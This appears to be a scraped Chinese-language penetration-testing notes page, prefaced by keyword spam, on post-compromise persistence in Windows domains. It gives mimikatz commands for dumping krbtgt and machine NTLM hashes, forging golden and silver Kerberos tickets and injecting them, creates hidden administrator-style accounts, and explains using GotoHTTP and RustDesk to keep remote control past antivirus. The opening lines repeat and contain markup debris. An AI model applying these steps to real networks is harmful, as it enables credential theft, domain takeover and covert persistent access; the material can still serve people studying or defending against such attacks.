北京外贸网站建设公司,哪一家好,极路由wordpress,做响应式网站公司0x01权限维持-隐藏用户
CreateHiddenAccount工具
CreateHiddenAccount -u test -p Psswrd用户管理能查看到#xff0c;命令查看看不到#xff0c;单机版无法删除(不在任何组)#xff0c;域环境(在administrator组中)可以删除
0x02权限维持-黄金白银票据
⻩⾦票据⽣成攻…0x01权限维持-隐藏用户
CreateHiddenAccount工具
CreateHiddenAccount -u test -p Psswrd用户管理能查看到命令查看看不到单机版无法删除(不在任何组)域环境(在administrator组中)可以删除
0x02权限维持-黄金白银票据
⻩⾦票据⽣成攻击是⽣成有效的TGT Kerberos票据并且不受TGT⽣命周期的影响TGT默认10⼩时最多续订7天这⾥可以为任意⽤户⽣成⻩⾦票据然后为域管理员⽣成TGT这样普通⽤户就可以变成域管理员。 白银票据SILVER TICKET是利用域的服务账户进行伪造的ST在Kerberos认证的第三步Client带着ST和Authenticator3向Server上的某个服务进行请求Server接收到Client的请求之后通过自己的Master Key 解密ST从而获得 Session Key。所以只需要知道Server用户的Hash就可以伪造出一个ST且不会经过KDC但是伪造的门票只对部分服务起作用不需要交互KDC需要知道Server的NTLM Hash。
一、黄金票据 利用条件 1.已经拿下域管理员获取到krbtgt hash 2.利用krbtgt的hash制作黄金票据工具进行攻击 利用 1.获取域的sid值最后4位不要 S-1-5-21-1218902331-2157346161-1782232778
whoami /user
whoami /all
wmic useraccount get name,sid2.域的KRBTGT账户NTLM-HASHb097d7ed97495408e1537f706c357fc5
mimikatz privilege::debug
mimikatz lsadump::lsa /patch3.伪造用户名dbadmin任意用户名 生成票据 mimikatz kerberos::golden /user:dbadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:g 导入内存
mimikatz kerberos::ptt g访问测试
dir \\owa2010cn-god\c$黄金票据总结 该攻击⽅式其实是⼀种后⻔的形式属于第⼆次进⾏攻击的⽅法。 第⼀次拿到域管权限之后需要将krbtgt NTLM hash进⾏保存当第⼆次再来进⾏域渗透攻击时我们就可使⽤krbtgt的NTLM hash制作⻩⾦票据从⽽再次获得域管权限。
二、白银票据 1.已经拿下域管理员获取到DC hash 2.利用DC的hash制作白银票据工具进行攻击 利用 1.获取域的sid值最后4位不要 S-1-5-21-1218902331-2157346161-1782232778
whoami /user
whoami /all
wmic useraccount get name,sid2.域DC账户NTLM-HASH bfe8cf6709038dd075d4cb5553b56412
mimikatz privilege::debug
mimikatz sekurlsa::logonpasswords3.伪造用户名dbbadmin任意用户名 导入票据CIFS文件共享服务 domain域名 sid域环境下的SID除去最后-的部分剩下的内容 target要访问的服务器写FQDN rc4写的是目标主机的NTLM主机名$对应NTLM service要访问的资源类型 user伪造的用户 cifs共享文件
mimikatz kerberos::golden /user:dbadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:owa2010cn-god /service:cifs /rc4:bfe8cf6709038dd075d4cb5553b56412 /ptt失败了
白银票据总结 1.伪造的ST只能访问指定的服务如CIFS 2.不与KDC交互直接访问Server 3.ST由服务账号 NTLM Hash 加密。
#权限维持-远控软件-GotoHTTPRustDesk 一、GotoHTTP 利用场景有网络下需要绕过杀毒等网络防护 B2C模式无需安装控制端软件有浏览器就可以远控。 流量走https协议只要目标放行443端口出口就可以实现内网穿透。 二、 RustDesk 利用场景无需网络需要绕过杀毒等网络防护 1、有网连接 C:\Users\用户名\AppData\Roaming\RustDesk\config 其中ID和密码在RustDesk.toml文件里。 连接 2、无网内网连接IP直连 注意权限问题最好以管理员打开这样才能创建监听端口或使用已开启监听的端口 RustDesk2.toml
direct-server Y
direct-access-port 8443
